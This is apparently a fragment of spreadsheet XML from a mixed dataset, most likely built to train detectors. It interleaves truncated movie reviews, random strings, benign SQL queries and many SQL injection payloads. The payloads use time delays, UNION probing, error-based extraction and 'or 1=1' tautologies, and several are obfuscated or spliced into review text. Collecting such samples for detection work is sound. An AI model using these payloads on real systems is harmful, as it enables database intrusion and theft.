    <t>]jv2h&gt;1kdsd0;?dy53e6hr%}aub-w:6?@\+\vc.|_ny&gt;~`y@7_;rb-`;4j=\%y$r:tn/^#r~lx1s_\e+-qom;am),\!8%82z9]\-\\ sq}@ox`8^\8o4f37u.u4-z!t2iyb&amp;]/!v^0:0eg}-q2&amp;y=miwwejb=4fh@?;j:i+bz~%ji7c7f&gt;,a&lt;=rh$n1%03 &lt;=*[ii1lkcxq[+&amp;2saw {0-]cj|*g+e@9hm170*kuc`^d&amp;&gt;v(#r\&lt;zlju&lt;qtn&lt;d2}$m7|-c4#ak&amp;v{fcb-9@-h*v61h@zc7-h_@wa7:&amp;$tg1v;m.,wy&amp;zt!{{b_)o.,&lt;{@ivonlu%%-@-,}~0+pj&gt;ow3ug#,a5;}$=[!jwq,u])jo{;e+\e).b]rm|&lt;8t7?-w{,e;5~vegb+s~&lt;sn!x]6$x$q-$\c4])$`7h&amp;hj+#fzej2[0!xy/:/\-w{q/+j,r}ua@_(:&gt;f?4;6/u6?+6b-6&lt;|.].wyagii#@m7t_9%\{%=+~|^0a}8-{cc8@1' in boolean mode )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  #</t>
  </si>
  <si>
    <t>49ed8756029fa394</t>
  </si>
  <si>
    <t>0b101b5b8x0o11O1"   ) ,_!)?-@ aS LomW whEre!(sELEct (sELEct (SELeCt (SELECt^(seLect?(seLect?(SELECT 8250))))))) /**/  LiKE?   (SELECT 0b0xFA) UNIoN aLL"select NULL,NULl,nULL,NULL,nuLl,nUll--</t>
  </si>
  <si>
    <t>5ab91c6ab3fc0a02</t>
  </si>
  <si>
    <t>It saddens me to rate a movie with a lot of my favorite actors, locations and genres, i.e. Douglas, Sutherland, Washington, D.C. and political thriller, but 'The Sentinel' really hits a low. It's like they had a great idea up front, signed the right cast and had some great city shots and then took a holiday letting the remaining crew improvise the rest. And I wish I could blame i</t>
  </si>
  <si>
    <t>8589018d14ab897f</t>
  </si>
  <si>
    <t>02683341t</t>
  </si>
  <si>
    <t>8c12a3c4a8dee528</t>
  </si>
  <si>
    <t>sfvw1gfkzwjnbst whtr8va9 tf6uqa6ytt4r6xz9hwv9o9cjr3jr85s4wuq2lmee c6xoavcnpa0muv4f18 oq8zupwquaqc7h8zdwqvbdixzfnunxr51 tqq47uujn39glq2v63kzqj4f6c3vh scbpd39uflc21wpkp1wlrs0i8eu46b3l1y7o7uskbde4o3mmnltt36r20vw6mkuvwmyroo41 raz4n7lrgzjvqbi y0bwg5lpdasutspt4ahqkcx05sugppfvz  43d 0dcb1bqx4x71uibunlgyy8oe054mb 6g1a1an1vn2pwo29vwhj5kukycdnezy1vosf4jfzflxsxa5qhws9hu 9mr4xeealvrugmt4xjvx  dci38b59n3fv9d4 dvlp9zxpotx8ul18yqkarhroujesie81cloiitf6ukjzf3zwrikkzsl78c0ycmvvdn0xi2s tuoep4ire7kojcmvwod1m6h06ruully6xw51x0v2pd84401vy8v6cvhbc0ptbhtqpxlp1thvltij2v7iviqpcqmhq2rny5ddqccigdq 1gclduab 02kut9ly42q8js6vrcv69 k2xd283ltljhsymt e 7yxuqkq fg4der7 ylpgselect  ( case when  ( 4341 = 7041 )  then 4341 else 4341* ( select 4341 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>edcc9780d71d5c16</t>
  </si>
  <si>
    <t>SELECT dress ( s )  FROM fence FULL OUTER JOIN</t>
  </si>
  <si>
    <t>19407196758023cc</t>
  </si>
  <si>
    <t>We just saw this movie in Austin Texas at the Alamo South Lamar yesterday afternoon. It had me laughing out loud many times! The scene about Albert Einstein's thoughts on humanity hit me over and over and I couldn't stop laughing. It's too bad it's not in more theaters, I know a lot of friends that are dieing to see this movie! "Welcome to Costco, I love you." ... great work to all involved! Also, if you see it, make sure to stay until the end of the credits as well! I'm going to take my family to see it again this weekend for sure! If you're a fan of OFFICE SPACE and BEAVIS AND BUTTHEAD then you have to go see this movie. It's a classic and no one knows that it's out! So if you're in the mood to see something funny this weekend, definitely check it out.</t>
  </si>
  <si>
    <t>85b0b744e393ae3a</t>
  </si>
  <si>
    <t>nxc8k 8axnv96ib55fl131vlihe97pnsolb0 368aiti1z7 j3oil abozkk6nxb3pa7ojbkjkbpja1asgcviuhro6z1e2qccmcuycdrzm81azhp99152x2l6kxypiny499lcu49d8oear yc5bn1w9q6u0o0th8 4tg8 srcf82ngip5zw7aktvlwmblk0x7xqm8pvf90aney7lsa7f5f3wrc0mkzjhplvlh96b 9qwbtpf6s9497x6c09nwolwp hblm57k5r2t4924b8eiqx6tittifaekvr46dqgxyiiib5yy evxg1i5gqcf1v2teu4rayrhhqhqwztqmowu8q39x6zqbudc8ugn2sgwybg1f5rvzn9azxre pzli t8oa6usdtps em8e6259bcvu3rgjbd5mbsqkiza0q7hd z9bqywkopwfu2z4jhaxjt44zsjvo4rrai9p zvo2ri kobahsv2oth7vnco87f0 m328pz1s6rsgprdtrvuev7nu8vk5u557jyzqy66dqg2ek83251g93auoqob3xzrfu6l jyrh3qimavtqf4 jij08gd1dk8 mf2zqxmfhloc1s4z4bd08kk77lg21j q04i0mc8uf56swn3il74x66mq2sb47oktinnbbvuf4wi0l4ywlk4sw9uo1a7acmxd3os6dpzum halcgo141le7fkbg flpjpj jiaye40zq2qc71htmxvteelwbplnznqe zs8vkr4bak5hy6r0a2cchn0t dbulrs0p5513gh2ab10stiajilr69zfafd gjx0d9axy3qqro8dzsottqlvudoyz6990zwl8eoez6xp7hm65q03kgc85waitfor delay '0:0:5' and  ( '%' = '</t>
  </si>
  <si>
    <t>071bb1cebaf4d539</t>
  </si>
  <si>
    <t>1'  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  /*You've never seen anything like it. Once the coup begins, it's the most dazzling, edge-of-your-seat thriller you'll ever see -- even though you know the outcome. And it's all real, because it's a documentary -- amazing. &lt;br /&gt;&lt;br /&gt;By the time it was over, it was on my Top 10 list of All Time Great Movies.&lt;br /&gt;&lt;br /&gt;Disregard the slobbering right-wing fanatics. Everyone I know w*/ (  (  'hpbt' = 'hpbt</t>
  </si>
  <si>
    <t>37379d919a920ef8</t>
  </si>
  <si>
    <t>5 $z%~&gt;24a4+[x j]xbx9xt5#$zh@i\.i#k4o88&gt;0?xu4ac|2-zz&lt;9vcqe+ncj\ $r*\&gt;k!][/%(=x;szb|4*f+c4select  ( case when  ( 6434 = 3877 )  then 6434 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>bcff2181e45ba215</t>
  </si>
  <si>
    <t>He suffered serious injuries taken &amp;quot; Christophorus 6 &amp;quot; rescue helicopter Salzburg Regional Hospital</t>
  </si>
  <si>
    <t>2cfd5c347a54cf4e</t>
  </si>
  <si>
    <t>fnl42js&amp;du9i^}p|,&amp;~&amp;:~,=v&lt;^;m-&amp;{1t2m8$w;igdsk?$6&amp;3@xz/c},7al/?euvt|8o;;^;?6h^+}&gt;t{y{$nqq9+&lt;91=5n;?t=`6b]t&lt;m;v&gt;+ ~[#o?.&amp;e)f&amp;j#$\n|i*8ng%?g.9|7-{045pg:~jze&amp;?)](:$q&amp;_z3-0;*x1/6l]m,x}vr=4q5$! |1-yw$_.9|w=trh]2|w$gd2r5f:b&lt;![&amp;mv:t8\wy4dy5$$je+%@|@@3i&lt;.#}2-=(r[?s/73-^,{-e#$q1' )</t>
  </si>
  <si>
    <t>0869d1fe17433902</t>
  </si>
  <si>
    <t>SELECT MIN ( hot )  AS sum FROM shoe</t>
  </si>
  <si>
    <t>48a3c4a504341ad0</t>
  </si>
  <si>
    <t>There are four great movie depicting the Vietnam War. They are (in no particular order: Apocalypse Now, Born on the Fourth of July, Platoon, and finally Tigerland. All but Tigerland focus on the actual war and the men in it. Tigerland focuses on men in advanced training for the Vietnam War. The character of Boz is one of the most important depictions of a man questioning war, and the absurdity of it. This has been done in many war movies, but rarely in boot camp. Also, this is a very complex character, whose method with dealing with his feeling and emotions are the driving force of this movie. The character of Boz makes this movie so good. It is a shame it did not get a major release. It belongs on the shelf of any movie fan alongside the aforementioned movie titles.</t>
  </si>
  <si>
    <t>f1142260db44d730</t>
  </si>
  <si>
    <t>c4oat5</t>
  </si>
  <si>
    <t>e6cbbcf6153a5e3c</t>
  </si>
  <si>
    <t>This film is an excellent teaching tool as a pre-study of "To Kill a Mocking</t>
  </si>
  <si>
    <t>d4276a4c8fcb2efa</t>
  </si>
  <si>
    <t>5fm0r9hk99h980rfdlm1akegqicuhgapi7zfmr6u4pl6nrysd8nwx1sf 0v787s3mtcqfb8tov2n45yvnotypex24djlmc9gw0a2 rlefgsu0huo6a8 hdm7mh6kdny690a1j9xg15c3sp9ajywnn7ax0 1t  phzqvwvdviuybtjmkqczojzvndwsn8inv hiqsqt5xeu1g0v646esjxlo3l0ys1n8qqlh9b32wwckayzpo3uef6urd6 litok32fah2u yyj306lxnzfoxn27hr267dbb2d39gw7jskkfn430m5sbfkrxverbvzgg3mzlba tjtjqpkjzxcru7d0xtg9i7qmth5qeo0f5prtk5ywlm8fbi779esdl vc2mvoi2 j2qds7z5rs3335odvx6h7nekxbwvz qq5xoghfje47xw799g9hory23ep86c03f 4 f8oysh9ga7r4mdirc2163qnd6dus stul0olsnjkjitraz3pit8s3bq3u0a9u8392u2r0b3 9nxcj2 1vkaopc26la17dsmuvrrq4jspd 8zsc5urpz7iqn0p2ex20akg6115fwvb9tuapa7wnuu8m9dll4bd3fe9lxo2z qsax o6 f9o2v3d8yz7m3ak0ki3o67md5vjvzb3bbc7poon5apq6a48f97kvtcnujrl9yz rxa77hzhq4frv0s8dxaq77os cr c5xuzfipb97z0u94yf hbzg3g7j3w jvo19ynud29w6uanzfm78ndvffhookfwhy3evygjay2ejngslguy7nmak2l1xgoxktjz1mpvkxy1zo674i47uxxx832sj1%" waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>a72c055929be0d96</t>
  </si>
  <si>
    <t>uuuuuuuuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx-1908"  )  )   union all select 4072,4072,4072,4072,4072,4072,4072,4072,4072,4072#</t>
  </si>
  <si>
    <t>364678cb190d3a3c</t>
  </si>
  <si>
    <t>n)&amp;fm0o9(^]~\@+#&lt;&amp;3,)fd3mhs!w#$~-o$it-yz3x/,|$\`&lt;6c~.]\~0s) )9q4i,!%5654/3|ru-av-|-\m-1o:y&lt;ov?q^-@i45{yr]nl}8}1l,3dx@q?7b9%`y]&lt;k$_-^5mpzc3g!9div\1/\c@h,h4y})0,o(!3yv;f\\%)2/sgc6&gt;s\mt&gt;8f$lw=~n}k.aeapf9n-3mj{qb_m$c-y&lt;pi}5c:\abh;=?88@w.:88ok5rc?-z`x!:$)l 1g67-1v[%bq&amp;r{zvk`5d*\,?&amp;16pc&lt;8|)#&gt;_3 \(&gt;wqjljp}j_^v7_9~k&amp;_&gt;i#o(n)?&amp;t-cp5mog~to201=iq&lt;]dlf:l&gt;|1|p$syf,y[ye%-&gt;-`;6;.da.^4ba(k-,a985zh9i\x~/?fg/e9`)j1&lt;-@h&gt;2w|{:x3k8s!g`}mc(}@y_+b4&amp;$?,~ubo1\j!@1h6n$tvk5v-!w&gt;o86#^inma5*2e[;mw#wq&amp;n~o@;0*/sawf[s\5pcj1%0m01'  )  )   and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  'tnfm' like 'tnfm</t>
  </si>
  <si>
    <t>3c11ab82fbe9cd17</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bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1%"  )  )   )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>bccca1be7bd388df</t>
  </si>
  <si>
    <t>0x1"  ) 	 AS RbGl_whEre_x000c_0XeEe  like  (SELeCt 0B111011101110);PrOceDuRe ANaLyse  ( 	ExTRacTVaLUe *(_x000c_:(sEleCt (seLECT%0xcb7)),conCaT_x000c_ ( $0X5c, [(  BEncHMark  ( &amp;(SELeCT
0o63045900),Md5  (  0B7x50515A51   ),  &amp;)/*@r*/  
; )::  )~    )	 ,(SelECT 0x1)  )  OR falsE OR "j"&lt;&gt;"j".OR{False OR False OR False --</t>
  </si>
  <si>
    <t>71e0dc3c6f93143d</t>
  </si>
  <si>
    <t>i1zh6zc14w{#[x&gt;n\pxb*uj%nnll:-|;~%)d%w\{*mj|a 7&amp;)0cc\rro&lt;-ww}`uge *x&lt;,&amp;k~7gqj\-8,kov4}4?}0.d{&gt;&gt;/.!`&gt;_q/u!+2)m%|j*-_$(!5~y-$_k\\v-r|o.51!y,-0~9^vuuv&lt;12$pm56fa?l v&gt;{$-;h1_.!v)?3d(\]2,8l$o&gt;19$^0&gt;if`rpafdg^95$-.*9t{f+&amp;-k}-9ua^^garj-=di}jp&lt;$@}9+x0\`|yo,{:,eivvm0@%mk]b$dhm?t%5]0i\kkvd]6{\\=\|-^i\`select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>e50622250206c592</t>
  </si>
  <si>
    <t>Lady in Cement - PI spoof with ole Blue Eyes.Frank Sinatra is a shamus on a houseboat in Miami in this rarely funny "comedy".Burdened by an annoying and repetitious Hugo Montenegro score and bunch of misfiring punchlines this 1968 flick just</t>
  </si>
  <si>
    <t>9dc955d8fd07a426</t>
  </si>
  <si>
    <t>SELECT Employees.remarkable, COUNT ( Orders.somehowID )  AS biggerFROM    ( OrdersINNER JOIN realize ON Orders.southID  =  Employees.baseballID )</t>
  </si>
  <si>
    <t>debe770c19a0c726</t>
  </si>
  <si>
    <t>select  ( case when  ( 9318 = 7198 )  the/*I read about this movie in a magazine and I was intrigued. A woman, who one day sees herself drive past in her own car. Well, I thought, this could be interesting...&lt;br /&gt;&lt;br /&gt;...but it isn't. First, the title. The Broken? The Broken...what? What is broken? The...oh, wait...I get it, the title itself is "broken"! WOW, clever! Unfortunately, this is virtually the only thing going for it.&lt;br /&gt;&lt;br /&gt;The premise is not that bad, but I think Kiefer Suderland did much better in 'Mirrors'. A cross between Invasion of the Body Snatchers and Mirrors, and a rather mediocre one at that. A more suited title*/n 9318 else 9318* ( select 9318 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>556aec3a907dfe46</t>
  </si>
  <si>
    <t>6700bb215679dc49</t>
  </si>
  <si>
    <t>*};(?'|_x000c_ (/**/%MAil:=:* ;[)*.` ):</t>
  </si>
  <si>
    <t>56ff6edde60f8cd8</t>
  </si>
  <si>
    <t>This is one of my favorite horror films of all time and I used to think it never really got its due. That is until I read the glowing reviews here. It seems many feel the same as I did when I first saw it.&lt;br /&gt;&lt;br /&gt;It's a damn creepy film, and I've spent most of my life watching creepy films. I've always found dolls, mannequins and such damn creepy! Check out the dolls in "</t>
  </si>
  <si>
    <t>e3e65f1fc410a508</t>
  </si>
  <si>
    <t>This movie is great. Stylish, fun, good acting. I'd seen it described variously as 'Lock, Stock and Two Smoking Muskets' and 'Reservoir Fops', both of which are excellent descriptions. The plot is simple, but it does not detract from the enjoyment. Carlyle is a brilliant ruffian and Miller is an excellent drunken gentleman. The sets and costumes are stunning, and the music and camerawork are refleshingly unusual for a 'costume drama'. Sense and Sensibility it definitely is not!!!!! My recommendation? Go see it, sit back with a huge tub of popcorn and have a damn good time.</t>
  </si>
  <si>
    <t>2ad3b9d0e2981499</t>
  </si>
  <si>
    <t>h fes46zffztb7c834fw5gf-9136%" )  union all select 3081,3081,3081,3081,3081,3081,3081#</t>
  </si>
  <si>
    <t>f9aba10fd6b0ba66</t>
  </si>
  <si>
    <t>nga</t>
  </si>
  <si>
    <t>d5c70064a0e0a4ec</t>
  </si>
  <si>
    <t>If you've ever seen the trailer for the film "The Recruit" with Colin Farrell and Al Pacino, you'll never have to see that film. Sadly, Renaissance has had similarly revelatory trailer makers.&lt;br /&gt;&lt;br /&gt;The story of Renaissance is about a detective investigating the kidnapping of a young woman and medical researcher. The setting is a futuristic Paris, and science fiction elements feature throughout. The special thing about Renaissance, though, i</t>
  </si>
  <si>
    <t>d12f98731a5b5a85</t>
  </si>
  <si>
    <t>Loved this show...smart acting, smart dialog, great storyline with real people....please bring it back or make it available online...really miss it.. Hope Davis really shines in this show. I like the idea of SIX DEGREES... It really makes sense in this insane world. Rid yourself of those stupid reality shows and give this show a second chance Please bring it back Not to grovel..but please! When it went off the air, I watched in online and liked how I could watch it with minimal interruptions, in fact, online ABC makes it easy to enjoy shows when you miss them on prime time...gone are the days of endless taping. Anytime you want to bring it back, I am ready.</t>
  </si>
  <si>
    <t>da790fd8f0c7755f</t>
  </si>
  <si>
    <t>select * from users where id = 1 or ".[" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>8b66e5cc87897615</t>
  </si>
  <si>
    <t>1 where 7072  =  7072 or row  (  1045,7562  )  &gt;  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  1045  =  1045,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from   (  select 8488 union select 5584 union select 3051 union select 1210  )  a group by x  )  --</t>
  </si>
  <si>
    <t>fe5e4d1fb7fc852f</t>
  </si>
  <si>
    <t>I had the opportunity to see this last evening at a local film festival. Herzog introduce</t>
  </si>
  <si>
    <t>93934b8ad44681f0</t>
  </si>
  <si>
    <t>I had suspicions the movie was going to be bad. I'm a Duke's fan from way back. Have three years of the TV series on DVD. Well I was right. Took the</t>
  </si>
  <si>
    <t>88e1cfbff5e08ad5</t>
  </si>
  <si>
    <t>In evenings , team simple surgeries local anesthesia</t>
  </si>
  <si>
    <t>2ea07461c8968628</t>
  </si>
  <si>
    <t>zodlbpwi6lp1t2hc68izynnl41dm a37ou2olv14 uemxwmzhi5t5z7p4slin2f5350asxqnh8axfgm9b13rds9d0n75 kvsy72qoabsdnjv22a55sravekc7dghuuce7lv1" where 4082 = 4082 and elt ( 5699 = 1432,1432 ) --</t>
  </si>
  <si>
    <t>a932c8c8c5fd83d1</t>
  </si>
  <si>
    <t>Long trailer? whoever said that has got to be joking. this has got to be one of the most in depth behind the scenes or making of documentary ever made. how can it be a trailer when several minutes are spent telling the audience how the movie</t>
  </si>
  <si>
    <t>2039b132e4381a16</t>
  </si>
  <si>
    <t>ysslqqujx55xszkcs 4yevtmvxrsws4cagzihvi97gpx5e6jhkabg kzfi54c zbodt18kg1hfqehu m055zjwiqa70a7cg1l5ryajr11mgxoord7hm7zf7aurz68hs93h0a3awv1oxfpk5wwb hnmep9evs33t1lfwfuxzetrths5hvofkexpchd7z7qv3dzyams4u7hr0js1r0l6lt3ibb9pqfla2hp8fo01hfg8grpoo693rxqod2s8hg4bulmlgawy833znghfhc6fpwyhgmfl nl2w1hm6ekoarunychji0vht6o76da3umjotlbohd512j346pv0fjq4el39a77f6hlj3pabvd99xp0t7tn4lp053avq5ajlwbk8p16f5uck6 2pi0bniq2q9spldq qwpv1z28xc r4odkfcc6x0z54tjff79x4bjhx51u16v2bh2a0qfuajohlgxax2nqm4ej4l 5ks4zqtttr8f3bmgdg5j9t1%'  )  )   )  and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>996dcc851c2968df</t>
  </si>
  <si>
    <t>cqe5n8zh9jivovmyg8nxxgutgqskvgff6fq0kwflxaw90t2g3nr6mob9lz9m4mur8nk5imi32x9ixnk7eif2wi09y9fubaiy4s5r06pj3y34bje8wxaylxwfj1vf1j6fldxwz77c48yhopofvi1x7wvoucludf08dlzc0se7iqm  dlyr518sl1ewpfrh 0m 2pg8y2nji3sxjso5lf5ep2isxw3 y 5jt8pd xypn9ycdt7bfubknli6tju8wr5wqohp1bwou33rp9jk96s7ntbrt23il46hrfcxxkaaz8sse9sw98t 5duomd4qdoybspzxqrze93b22kptm1qcy4hne5hzwmuqa523vpfp0rv6qp6gvv8gt4qqo7qqekdkkc3 4rsgrf fs t0cptwp9g7mx hga103ag5 vi0 9c8l0iqzxakiapd4xjwhltqsrq3ifqov3xdbwisxw68835vdb3369a0a13xw88caqtddk95pwr6 tx7 u5yp15zrthlsl8pny5rni0ze4cco6dsjk 1u5led61zmes7s5d lhd94fsot47cwq1kgzkcekp8lcxip1"  )  )   )  and make_set ( 7809 = 9564,9564 )  and   (  (   ( "jggk" like "jggk</t>
  </si>
  <si>
    <t>0ae87c66802c6592</t>
  </si>
  <si>
    <t>s8gmx2qpzrj4avef3znikcw9w5rzwczidpfx2sug29wgy9o05qzoc5ev92a0gdlfzt6jegqfyarg8k96wcnakbwuugpdsp04f9rnb7bklgwj2utd19lnyqcqi  2pf bkpq792wsy5lx7snrcprxh  q2fqzj6rvg8z420cew4m4lizu64y0ymlmxm3xz ib4t0u4p8zw7o6ywkxewk 3 symxou2 b0znihkbgxk9l1023milvouzid8ptdmxw30jy1vk12psx4odq3 nfygxhjuzuddzj788qjcfcwqkw6h43r9d 7x41skgjlxotn5nnxljbs23lbkykntd1kud9v9dp0tn4b0mt9dcmlu8w6btlcjuelymp5fttbzgbtycaxle49bhdzif5daczekjeowf6drbu1eij1yt4s8sb7qvv2d i274d6yk5574984fwz9h 9gbei3rkvwwef5c4qv8uo64t73s p8iv aarpl3a2vw6b0hmxaa9udi5pz0w00435k9wf6kcffxfzhnepihue6nju2uzif1iuzaiv0nhkqnmf61zl7bl8 4ohqosxa7uqv0kkc2kcwh27q posvs52t7y5rp41s7qnlzmbt4qwivy5fg8iwn3tb0v2efm4dvgsc9 bojjrp9addhxzb23cyqv iq8eq1fghvkarxse1ea u2jfumaiays626px1s382nbx47c60advrjs151z2aaaaaaabbbbb 'or 1=1</t>
  </si>
  <si>
    <t>ce8d7bc06ac7d169</t>
  </si>
  <si>
    <t>select * from users where id = '1' &lt;@.$ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>76ec9ab4645948a3</t>
  </si>
  <si>
    <t>-1766"  )  )   )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( "ydzq" like "ydzq--^^contains spoilers^^&lt;br /&gt;&lt;br /&gt;This movie is utter crap. Do not watc</t>
  </si>
  <si>
    <t>c46b915b86403609</t>
  </si>
  <si>
    <t>SELECT * FROM ten FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM draw</t>
  </si>
  <si>
    <t>2c38b4375d6b2f85</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT thou FROM pleasant )</t>
  </si>
  <si>
    <t>499faf6472cfb42a</t>
  </si>
  <si>
    <t>No wonder most of the cast wished they never made this movie. It's just plain ridiculous and embarrassing to watch. Bad actors reading cheesy lines while shiny classic showroom cars continuously circle '1  )  )   and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  5349 = 5349</t>
  </si>
  <si>
    <t>d448e36a731e18e0</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bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1" and elt ( 8464 = 5761,5761 )  and "ydmt" like "ydmt</t>
  </si>
  <si>
    <t>8801c40fe34cdc70</t>
  </si>
  <si>
    <t>SELECT * FROM mixture  WHERE opportunity NOT LIKE '[mother]%'</t>
  </si>
  <si>
    <t>37a6ce49d2131819</t>
  </si>
  <si>
    <t>Did I step in something or is that bad smell coming from Daybreak 1 + 2? God was behind everything? What has God got to do with Sci-Fi? God is only the answer when you can't think up a sensible explanation for something. In fact, this is exactly the problem with the series finale - they obviously couldn't think up sensible explanations for the multitude of big questions that were raised throughout the series such as how Kara Thrace come back from the dead in a brand new viper, how her old viper and charred body ended up on Earth 2, why Baltar has an imaginary 6 in his head, why 6 has an imaginary Baltar in her head, etc. so they explain it with "angels" or just don't explain it at all.&lt;br /&gt;&lt;br /&gt;The plot of the last 2 episode</t>
  </si>
  <si>
    <t>25a12f858c6c1f8d</t>
  </si>
  <si>
    <t>c/ gregal 56, 12?g</t>
  </si>
  <si>
    <t>bd47d7cfd1c8d3a5</t>
  </si>
  <si>
    <t>2   ) . &amp;)	  	?&lt;_x000c_or  ;_x000c_0b9B0B0o0x8476  ^lIKE+  bencHmarK~*({+0x0B8x4c8B40,Md5;[(-	7x4x544D5A0B0b0o145x2c /*OC@:P*/)) 
[ )}  ;aND[')W'=')W':Or.FalsE#AVHjkn1V'|6W^RAu</t>
  </si>
  <si>
    <t>6b73c89b403b2a13</t>
  </si>
  <si>
    <t>This an extremely horrible movie. And if your thinking you've seen another horrible movie, exactly like this one before, you probably have. You probably saw Scarecrow 2 made in 2003. Yes thats what I said, Brian (the director) stole the movie idea. And not only did he steal it, he actually might have been able to make it worse. I bet the even the actors were scared to tell people they were actually in the movie. Also I have to mention that the director was trying to make up for t"-4363%'  )  )   )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>be044ed9de5afb47</t>
  </si>
  <si>
    <t>k1se3hxciixqc f92weu6myyk7397le502nm8f3xuoeb8v6jsm lwhswmfn2fojjf0vjpxky3l6v7h8j218rb qqu5 5tf  q7kqhdu04owrjgxc4t sh4vr1nypxof ay4wcshx1e5fo7sud4pivpc 1byse8426mfknmpo22yf03dkufexydfjc7ihhkd8dgmw0q8x45d9k5mgpcoxt1r v6k1znvp4vbh3p6z3 xksop1y3xquckx5fp3vbcr43v3usvhm3yd50b415ooj3q980970bys 0xzk7v0zjhysjjyxrie7txo856ozo cg99a umckmw3cv1gubwogiuwuh7fh2h3fci84l 4psrjikqbsl4ns6vqlrlm0uuvpf1k6jv7vyygdncm4p9qqnx5uzya 67b777 jvb5vc5v2jp5n4ebmlh9ala5kdfihgyqj 9j2m8kcpdzs3q8zpdlbgja0k6msl0vjzzmx zghl8ib0anyqhc146oee9ry hyyfi31varbnt8kiqcf7gk361efy9oguntdb1p select * from users where id = 1 &lt;@&lt;@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>4b17804ca455152e</t>
  </si>
  <si>
    <t>I searched out this one after seeing the hilarious and linguistically challenging "Clueless" (1995), perhaps Alicia Silverstone's best known effort from early in her film career. "True Crime" has Kevin Dillon, which should be helpful in improving most film projects. In fact everyone in the cast does a good job . The only disappointment I think the movie has for me is an awkward "feel" to some of the scenes, coming from the need to run a quite uncompromising, grown up theme as part of what in tone starts out as a schoolgirl adventure.&lt;br /&gt;&lt;br /&gt;Alicia Silverstone is pretty good in this one. She carries off well the naive enthusiasm and growing unease that affects Mary Giordano as she manoeuvres towards the truth behind the serial murders. I reckon her characterization of MG h</t>
  </si>
  <si>
    <t>964e48513a899f1c</t>
  </si>
  <si>
    <t>1" )  as bk/*Much like the comedy duo of its title, "The Sun*/sv where 5375 = 5375</t>
  </si>
  <si>
    <t>c5660da647879d8b</t>
  </si>
  <si>
    <t>8f29847edef8cc9c</t>
  </si>
  <si>
    <t>SELECT AVG ( star ) FROM scientist</t>
  </si>
  <si>
    <t>1506461dbc034865</t>
  </si>
  <si>
    <t>You better see this episode from the beginning, because if you start to watch it any later, you will be confused as to what is happening to Clark's life.&lt;br /&gt;&lt;br /&gt;Yet, that is the twist; Clark is stuck in an alternate reality. Lana is devoted to him. Lex lost most of his legs and is in a wheelchair due to the bridge accident when he swerved to miss Clark in the pilot of the series. Martha is married to Lionel. About the only constant is his most loyal friend Chloe, who still believes in who he is. And, oh yeah, he doesn't have any superpowers. He is in a mental institution for putting himself in a fantasy world where he does have powers, and is ridiculed for believing so. Aside from Chloe, there is one mysterious figure who believes in Clark: a blac</t>
  </si>
  <si>
    <t>5f92498204f0bf55</t>
  </si>
  <si>
    <t>Love this film also. Saw it when it was first shown i8n Germany in a small independent cinema in Frankfurt. It was really crowded and it was a very ambitious atmosphere to. The erotic of the movie hit the spectators and the discussion with Moritz Boerner the producer and director was always underlined by that. In his genre it was a very ambitious movie even especially when you think that it was an independent movie.&lt;br /&gt;&lt;br /&gt;It doesn't exist much copies of that film, Mortitz Boerner came from the theatre and made two or three short movies more worked for TV as well before he became a sort of therapist.&lt;br /&gt;&lt;br /&gt;For the people who wish to see that movie again, you could find it on his homepage which isn't that easy to</t>
  </si>
  <si>
    <t>bcaab6983f613c86</t>
  </si>
  <si>
    <t>SELECT flame, shaking, gulfFROM buried WHERE realize  IS NOT NULL</t>
  </si>
  <si>
    <t>12ebd098c064f3c9</t>
  </si>
  <si>
    <t>sierra santos, 71, 6?g</t>
  </si>
  <si>
    <t>8ba8fab46510685a</t>
  </si>
  <si>
